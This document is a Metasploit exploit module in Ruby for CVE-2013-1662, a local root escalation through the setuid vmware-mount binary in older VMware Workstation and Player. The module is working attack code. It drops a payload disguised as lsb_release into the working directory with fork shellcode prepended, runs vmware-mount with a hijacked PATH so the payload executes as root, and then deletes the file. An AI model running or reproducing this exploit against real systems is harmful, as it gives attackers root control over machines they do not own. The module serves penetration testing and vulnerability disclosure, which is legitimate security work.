VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit4 < Msf::Exploit::Local

  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File

  def initialize(info={})
    super( update_info( info, {
        'Name'          => 'VMWare Setuid vmware-mount Unsafe popen(3)',
        'Description'   => %q{
          VMWare Workstation (up to and including 9.0.2 build-1031769)
          and Player have a setuid executable called vmware-mount that
          invokes lsb_release in the PATH with popen(3). Since PATH is
          user-controlled, and the default system shell on
          Debian-derived distributions does not drop privs, we can put
          an arbitrary payload in an executable called lsb_release and
          have vmware-mount happily execute it as root for us.
        },
        'License'       => MSF_LICENSE,
        'Author'        =>
          [
            'Tavis Ormandy', # Vulnerability discovery and PoC
            'egypt' # Metasploit module
          ],
        'Platform'      => [ 'linux' ],
        'Arch'          => ARCH_X86,
        'Targets'       =>
          [
            [ 'Automatic', { } ],
          ],
        'DefaultOptions' => {
          "PrependSetresuid" => true,
          "PrependSetresgid" => true,
        },
        'Privileged'     => true,
        'DefaultTarget' => 0,
        'References' => [
          [ 'CVE', '2013-1662' ],
          [ 'OSVDB', '96588' ],
          [ 'BID', '61966'],
          [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
          [ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
        ],
        'DisclosureDate' => "Aug 22 2013"
      }
      ))
    # Handled by ghetto hardcoding below.
    deregister_options("PrependFork")
  end

  def check
    if setuid?("/usr/bin/vmware-mount")
      CheckCode::Vulnerable
    else
      CheckCode::Safe
    end
  end

  def exploit
    unless check == CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
    end

    # Ghetto PrependFork action which is apparently only implemented for
    # Meterpreter.
    # XXX Put this in a mixin somewhere
    # if(fork()) exit(0);
    # 6A02              push byte +0x2
    # 58                pop eax
    # CD80              int 0x80 ; fork
    # 85C0              test eax,eax
    # 7406              jz 0xf
    # 31C0              xor eax,eax
    # B001              mov al,0x1
    # CD80              int 0x80 ; exit
    exe = generate_payload_exe(
      :code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
    )
    write_file("lsb_release", exe)

    cmd_exec("chmod +x lsb_release")
    cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
    # Delete it here instead of using FileDropper because the original
    # session can clean it up
    cmd_exec("rm -f lsb_release")
  end

  def setuid?(remote_file)
    !!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true")
  end

end